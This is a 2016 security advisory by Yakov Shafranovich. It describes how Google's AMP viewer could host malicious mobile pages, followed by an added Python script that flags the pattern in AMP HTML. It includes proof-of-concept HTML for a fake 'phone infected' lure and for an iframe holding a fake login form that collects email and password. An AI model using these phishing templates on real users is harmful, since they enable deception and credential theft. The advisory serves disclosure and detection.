Advisory: Using to Host Malicious Mobile Content


It is possible to use a flaw in to host malicious content. However, such content is not able to interact with anything on domain itself.


Google’s main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP. The current implementation will display any AMP page on the Internet without checking its content. The URL is as follows:

where XXXX is the URL of the site. This ONLY works on mobile devices (it can be simulated using Chrome’s developer tools); on desktop browsers it redirects to the page itself, as described in our earlier post. Here is a real working example:

Example of AMP site running on directly

This, however, can be used to display malicious content. Due to the way AMP is designed, AMP pages are not allowed to contain JavaScript or “javascript:” URLs. They can, however, contain URLs that lead to the Google Play Store or iTunes. This can be leveraged to fool users into installing apps they don’t need, all served from Google’s site. Here is an example screenshot; note the URL and that a valid certificate is used. The link goes to the Google Play Store.

Source code - BODY tag only, rest is standard AMP HTML (see here):

<body>
<amp-img src="glogo.jpg" alt="logo" height="200px" width="300px"></amp-img>
<h3>We have scanned your phone and found it to be infected with a virus. To clean your off, please click on the link below</h3>
<p><a href="">Clean My Phone</a></p>
</body>

Taking this a step further, while AMP does not allow forms and JavaScript in the main page, it does allow JavaScript and forms inside an iframe, as long as that iframe is at least 75% down from the top of the page. This can be used to embed a malicious login form inside an iframe, which can then be used to steal people’s Google account credentials. Example screenshot and source below; this is not styled since it is a POC.


Main page BODY:

<amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
<amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
<h3>You have logged out of your account, please login again below</h3>
<amp-iframe width="300px" height="300px"
    sandbox="allow-scripts allow-forms" layout="responsive"
    frameborder="0" src="iframe.html">
</amp-iframe>

Iframe Source:

<!doctype html>
<meta charset="utf-8">
<form action="">
Email: <input type="text" name="email"/><br/>
Password: <input type="password" name="password"/><br/>
<input type="submit"/>
</form>
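The two POCs above share one static signature: a link out to an app store, and an amp-iframe whose sandbox re-enables scripts and forms. The following triage script is an added example (not part of the original advisory and not Google's or the AMP project's code) that flags exactly those features in an AMP document so a reviewer or a content-moderation pipeline can queue the page for inspection. The sample pages, the third-party.example host and the Play Store URL in them are constructed for the example; the app-store host list is an assumption.

```python
"""Static triage of AMP HTML for the hosting pattern described in the advisory."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that lead straight to an app store (assumed list, extend as needed).
APP_STORE_HOSTS = {"play.google.com", "itunes.apple.com", "apps.apple.com"}
# Sandbox tokens that give an amp-iframe back what AMP forbids on the main page.
RISKY_SANDBOX_TOKENS = {"allow-scripts", "allow-forms"}


class AmpTriage(HTMLParser):
    """Collects (kind, detail, tokens) findings while the document is parsed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "amp-iframe":
            # Tokens are space separated; compare against the risky set.
            tokens = set((a.get("sandbox") or "").split())
            risky = tokens & RISKY_SANDBOX_TOKENS
            if risky:
                self.findings.append(("amp-iframe-sandbox", a.get("src", ""), sorted(risky)))
        elif tag == "a":
            host = urlparse(a.get("href", "")).hostname or ""
            if host in APP_STORE_HOSTS:
                self.findings.append(("app-store-link", a.get("href", ""), []))
        elif tag in ("form", "script"):
            # These are invalid in AMP itself; seeing them means the document is
            # not the AMP page but content loaded into it (e.g. the iframe body).
            self.findings.append(("forbidden-element", tag, []))


def triage_amp(html):
    """Parse an HTML document and return the list of findings."""
    parser = AmpTriage()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: the advisory's two POC bodies merged into one AMP page.
SAMPLE_MAIN_PAGE = """<!doctype html>
<html amp><head><meta charset="utf-8"></head><body>
<amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
<h3>We have scanned your phone and found it to be infected with a virus.</h3>
<p><a href="https://play.google.com/store/apps/details?id=example.placeholder">Clean My Phone</a></p>
<h3>You have logged out of your account, please login again below</h3>
<amp-iframe width="300px" height="300px"
    sandbox="allow-scripts allow-forms" layout="responsive"
    frameborder="0" src="https://third-party.example/iframe.html"></amp-iframe>
</body></html>"""

# Constructed sample: the credential-harvesting iframe body from the advisory.
SAMPLE_IFRAME_PAGE = """<!doctype html>
<meta charset="utf-8">
<form action="">
Email: <input type="text" name="email"/><br/>
Password: <input type="password" name="password"/><br/>
<input type="submit"/>
</form>"""

if __name__ == "__main__":
    for name, doc in (("main page", SAMPLE_MAIN_PAGE), ("iframe", SAMPLE_IFRAME_PAGE)):
        print(name)
        for kind, detail, tokens in triage_amp(doc):
            print(f"  {kind}: {detail} {' '.join(tokens)}")
```

Treat the output as a signal rather than a verdict: `allow-scripts allow-forms` is a legitimate sandbox for many AMP embeds, so the useful review question is whether the iframe origin belongs to the publisher and whether the page's text is pressuring the user toward the store link or the form.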

Vendor Response

The vendor has communicated that they do not consider this to be a security issue.



Researched and written by Yakov Shafranovich.


2016-04-12: Vendor notified
2016-04-13: Vendor response
2016-04-13: Public disclosure
